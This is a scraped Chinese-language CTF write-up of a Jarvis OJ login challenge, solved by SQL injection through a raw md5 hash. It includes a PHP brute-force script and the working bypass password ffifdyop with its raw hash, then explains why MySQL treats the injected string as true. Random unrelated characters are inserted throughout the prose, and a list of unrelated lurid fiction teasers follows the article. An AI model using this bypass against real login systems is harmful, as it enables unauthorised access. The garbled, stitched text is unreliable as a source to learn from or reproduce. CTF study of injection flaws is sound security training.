【Jarvis OJ】Login--password='".md5($pass,true)."'

Login

題目

需要密碼才能獲得flag哦糊识。
題目鏈接:http://web.jarvisoj.com:32772

思路:
打開鏈接是一個提交password界面浮梢,放到burp里看一看呀~


看到有提示哦~
Hint: "select * from `admin` where password='".md5($pass,true)."'"

一看到md5舆乔,我就想到password為md5為0e開頭的值缴允。輸入
password蕉鸳;s878926199a
這時出現(xiàn)了Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /opt/lampp/htdocs/index.php on line 14.才發(fā)現(xiàn)以上行不通映砖。出現(xiàn)這個問題的原因是沒有理解".md5($pass,true)."的含義呀。

參考文章:https://blog.csdn.net/March97/article/details/81222922 哈哈面粮,在這里我找到了md5(string,raw)的含義少孝。

mdr(string,raw)

關注重點放到

password='".md5($pass,true)."'

上。
參考:
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/

原始md5可以包含任何字符熬苍,并且腳本將它們按原樣放入查詢中 - 它是一個sql注入版本稍走。
我們要做的是強制使用原始md5包含'或'的密碼,以便查詢看起來像

SELECT login FROM admins WHERE  password  =  '<trash>' 或'1 <shit>'

這里使用的php代碼

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

通過暴力破解柴底,最后找到了這樣一個密碼呀~I’ve found a password: ffifdyop, with hash: 276f722736c95d99e921722cf9ed621c (‘or’6<trash>).

content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

但是我們思考一下為什么6\xc9]\x99\xe9!r,\xf9\xedb\x1c的布爾值是true呢婿脸?

這里引用一篇文章”ぃ“a string starting with a 1 is cast as an integer when used as a boolean."
在mysql里面狐树,在用作布爾型判斷時,以1開頭的字符串會被當做整型數(shù)凿歼。要注意的是這種情況是必須要有單引號括起來的褪迟,比如password=‘xxx’ or ‘1xxxxxxxxx’冗恨,那么就相當于password=‘xxx’ or 1 答憔,也就相當于password=‘xxx’ or true,所以返回值就是true掀抹。當然在我后來測試中發(fā)現(xiàn)虐拓,不只是1開頭,只要是數(shù)字開頭都是可以的傲武。
當然如果只有數(shù)字的話蓉驹,就不需要單引號城榛,比如password=‘xxx’ or 1,那么返回值也是true态兴。(xxx指代任意字符)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末狠持,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子瞻润,更是在濱河造成了極大的恐慌喘垂,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,122評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件绍撞,死亡現(xiàn)場離奇詭異正勒,居然都是意外死亡,警方通過查閱死者的電腦和手機傻铣,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,070評論 3 395
  • 文/潘曉璐 我一進店門章贞,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人非洲,你說我怎么就攤上這事鸭限。” “怎么了怪蔑?”我有些...
    開封第一講書人閱讀 164,491評論 0 354
  • 文/不壞的土叔 我叫張陵里覆,是天一觀的道長。 經(jīng)常有香客問我缆瓣,道長喧枷,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,636評論 1 293
  • 正文 為了忘掉前任弓坞,我火速辦了婚禮隧甚,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘渡冻。我一直安慰自己戚扳,他們只是感情好,可當我...
    茶點故事閱讀 67,676評論 6 392
  • 文/花漫 我一把揭開白布族吻。 她就那樣靜靜地躺著帽借,像睡著了一般。 火紅的嫁衣襯著肌膚如雪超歌。 梳的紋絲不亂的頭發(fā)上砍艾,一...
    開封第一講書人閱讀 51,541評論 1 305
  • 那天,我揣著相機與錄音巍举,去河邊找鬼脆荷。 笑死,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的蜓谋。 我是一名探鬼主播梦皮,決...
    沈念sama閱讀 40,292評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼桃焕!你這毒婦竟也來了剑肯?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,211評論 0 276
  • 序言:老撾萬榮一對情侶失蹤观堂,失蹤者是張志新(化名)和其女友劉穎退子,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體型将,經(jīng)...
    沈念sama閱讀 45,655評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡寂祥,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,846評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了七兜。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片丸凭。...
    茶點故事閱讀 39,965評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖腕铸,靈堂內(nèi)的尸體忽然破棺而出惜犀,到底是詐尸還是另有隱情,我是刑警寧澤狠裹,帶...
    沈念sama閱讀 35,684評論 5 347
  • 正文 年R本政府宣布虽界,位于F島的核電站,受9級特大地震影響涛菠,放射性物質(zhì)發(fā)生泄漏莉御。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,295評論 3 329
  • 文/蒙蒙 一俗冻、第九天 我趴在偏房一處隱蔽的房頂上張望礁叔。 院中可真熱鬧,春花似錦迄薄、人聲如沸琅关。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,894評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽涣易。三九已至,卻和暖如春冶伞,著一層夾襖步出監(jiān)牢的瞬間新症,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,012評論 1 269
  • 我被黑心中介騙來泰國打工碰缔, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留账劲,地道東北人戳护。 一個月前我還...
    沈念sama閱讀 48,126評論 3 370
  • 正文 我出身青樓金抡,卻偏偏與公主長得像瀑焦,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子梗肝,可洞房花燭夜當晚...
    茶點故事閱讀 44,914評論 2 355